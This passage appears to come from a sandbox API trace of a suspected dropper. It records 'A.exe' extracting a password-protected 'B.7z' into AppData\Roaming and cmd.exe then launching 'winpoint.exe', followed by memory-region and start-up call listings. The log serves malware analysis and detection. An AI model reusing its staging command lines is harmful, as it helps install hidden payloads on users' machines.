b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x01", lpUsedDefaultChar=0x0) returned 256 [0159.178] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x49373c, nSize=0x104 | out: lpFilename="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\A.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\a.exe")) returned 0x2a [0159.180] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x46e664) returned 0x0 [0159.189] GetVersionExA (in: lpVersionInformation=0x18fe94*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x491510, dwBuildNumber=0x9142a8, dwPlatformId=0x491510, szCSDVersion="") | out: lpVersionInformation=0x18fe94*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.190] GetVersionExA (in: lpVersionInformation=0x18fe64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18fe90, dwMinorVersion=0x100, dwBuildNumber=0x4597c8, dwPlatformId=0xd, szCSDVersion="GenuineIntelã\x06\x05") | out: lpVersionInformation=0x18fe64*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.190] SetConsoleCtrlHandler (HandlerRoutine=0x4018da, Add=1) returned 1 [0159.190] SetFileApisToOEM () [0159.190] GetCommandLineW () returned="A.exe x B.7z -psL3117nTGnp393SLZxZy -o\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\" -aoa" [0159.650] SetFileTime (hFile=0x9c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x7a10b8) returned 1 [0159.650] CloseHandle (hObject=0x9c) returned 1 [0159.650] SetFileAttributesW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab", dwFileAttributes=0x20) returned 1 [0159.651] SetEvent (hEvent=0x8c) returned 1 [0159.651] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0159.652] SetEvent (hEvent=0x90) returned 1 [0159.652] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0159.653] CloseHandle (hObject=0x98) returned 1 [0159.653] CloseHandle (hObject=0x94) returned 1 [0159.653] CloseHandle (hObject=0x90) returned 1 [0159.657] SetConsoleCtrlHandler (HandlerRoutine=0x4018da, Add=0) returned 1 [0159.658] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x46e664 [0159.658] ExitProcess (uExitCode=0x0) Thread: id = 58 os_tid = 0x888 [0159.582] GetCurrentThreadId () returned 0x888 [0159.582] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0159.582] SetFilePointer (in: hFile=0x80, lDistanceToMove=32, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x20 [0159.582] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0x20000, lpOverlapped=0x0) returned 1 [0159.583] ResetEvent (hEvent=0x84) returned 1 [0159.583] SetEvent (hEvent=0x88) returned 1 [0159.583] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.597] SetFilePointer (in: hFile=0x80, lDistanceToMove=131104, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x20020 [0159.597] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0x20000, lpOverlapped=0x0) returned 1 [0159.598] ResetEvent (hEvent=0x84) returned 1 [0159.598] SetEvent (hEvent=0x88) returned 1 [0159.598] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.615] SetFilePointer (in: hFile=0x80, lDistanceToMove=262176, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x40020 [0159.615] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0x20000, lpOverlapped=0x0) returned 1 [0159.616] ResetEvent (hEvent=0x84) returned 1 [0159.616] SetEvent (hEvent=0x88) returned 1 [0159.616] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.619] SetFilePointer (in: hFile=0x80, lDistanceToMove=393248, lpDistanceToMoveHigh=0x20dfe34*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20dfe34*=0) returned 0x60020 [0159.619] ReadFile (in: hFile=0x80, lpBuffer=0x3c0000, nNumberOfBytesToRead=0xe520, lpNumberOfBytesRead=0x20dfe0c, lpOverlapped=0x0 | out: lpBuffer=0x3c0000*, lpNumberOfBytesRead=0x20dfe0c*=0xe520, lpOverlapped=0x0) returned 1 [0159.619] ResetEvent (hEvent=0x84) returned 1 [0159.619] SetEvent (hEvent=0x88) returned 1 [0159.619] WaitForMultipleObjects (nCount=0x2, lpHandles=0x20dfeb0*=0x84, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0159.632] SetEvent (hEvent=0x88) returned 1 [0159.633] SetEvent (hEvent=0x94) returned 1 [0159.633] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0159.652] GetLastError () returned 0x0 [0159.652] SetLastError (dwErrCode=0x0) [0159.652] RtlExitUserThread (Status=0x0) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6c838000" os_pid = "0x890" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x4c8" cmd_line = "cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1052 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1053 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1054 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1055 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1056 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1057 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1058 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1059 start_va = 0x4a920000 end_va = 0x4a96bfff entry_point = 0x4a920000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1060 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1061 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1062 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1063 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1064 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1065 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1066 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1067 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1068 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1069 start_va = 0x270000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1070 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1071 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1072 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1074 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1075 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1076 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1077 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1078 start_va = 0x756e0000 end_va = 0x756e6fff entry_point = 0x756e0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1079 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1080 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1081 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1082 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1083 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1084 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1085 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1086 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1087 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1088 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1089 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1090 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 1091 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1092 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1093 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1094 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1095 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1096 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1097 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1098 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1099 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1100 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1101 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1102 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1103 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1104 start_va = 0x1c70000 end_va = 0x1fb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Thread: id = 59 os_tid = 0x894 [0160.412] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb14 | out: lpSystemTimeAsFileTime=0x22fb14*(dwLowDateTime=0x61da0a70, dwHighDateTime=0x1d4406f)) [0160.412] GetCurrentProcessId () returned 0x890 [0160.412] GetCurrentThreadId () returned 0x894 [0160.412] GetTickCount () returned 0x30694 [0160.412] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb0c | out: lpPerformanceCount=0x22fb0c*=27862759647) returned 1 [0160.413] GetModuleHandleA (lpModuleName=0x0) returned 0x4a920000 [0160.414] __set_app_type (_Type=0x1) [0160.414] __p__fmode () returned 0x75c631f4 [0160.414] __p__commode () returned 0x75c631fc [0160.414] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9421a6) returned 0x0 [0160.414] __getmainargs (in: _Argc=0x4a944238, _Argv=0x4a944240, _Env=0x4a94423c, _DoWildCard=0, _StartInfo=0x4a944140 | out: _Argc=0x4a944238, _Argv=0x4a944240, _Env=0x4a94423c) returned 0 [0160.414] GetCurrentThreadId () returned 0x894 [0160.414] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x894) returned 0x60 [0160.414] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.414] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadUILanguage") returned 0x75cba84f [0160.414] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.416] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22faa4 | out: phkResult=0x22faa4*=0x0) returned 0x2 [0160.416] VirtualQuery (in: lpAddress=0x22fadb, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.416] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa74, dwLength=0x1c | out: lpBuffer=0x22fa74*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.416] GetConsoleOutputCP () returned 0x1b5 [0160.417] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a944260 | out: lpCPInfo=0x4a944260) returned 1 [0160.417] SetConsoleCtrlHandler (HandlerRoutine=0x4a93e72a, Add=1) returned 1 [0160.417] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.417] SetConsoleMode (hConsoleHandle=0x1a0, dwMode=0x0) returned 0 [0160.417] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.417] GetConsoleMode (in: hConsoleHandle=0x1a0, lpMode=0x4a9441ac | out: lpMode=0x4a9441ac) returned 0 [0160.417] _get_osfhandle (_FileHandle=0) returned 0x198 [0160.417] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0x4a9441b0 | out: lpMode=0x4a9441b0) returned 0 [0160.418] GetEnvironmentStringsW () returned 0x342238* [0160.418] FreeEnvironmentStringsW (penv=0x342238) returned 1 [0160.418] GetEnvironmentStringsW () returned 0x342238* [0160.418] FreeEnvironmentStringsW (penv=0x342238) returned 1 [0160.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea14 | out: phkResult=0x22ea14*=0x68) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x0, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x0, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegCloseKey (hKey=0x68) returned 0x0 [0160.419] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea14 | out: phkResult=0x22ea14*=0x68) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x40, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x1, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x0, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x9, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x4, lpData=0x22ea20*=0x9, lpcbData=0x22ea18*=0x4) returned 0x0 [0160.419] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea1c, lpData=0x22ea20, lpcbData=0x22ea18*=0x1000 | out: lpType=0x22ea1c*=0x0, lpData=0x22ea20*=0x9, lpcbData=0x22ea18*=0x1000) returned 0x2 [0160.419] RegCloseKey (hKey=0x68) returned 0x0 [0160.419] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8801d6 [0160.419] srand (_Seed=0x5b8801d6) [0160.419] GetCommandLineW () returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0160.419] GetCommandLineW () returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0160.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a945260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.420] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x344568, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0160.420] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.420] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.420] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0160.420] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.420] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.420] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.420] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.420] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.420] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.420] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.420] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.420] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.420] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7e0 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 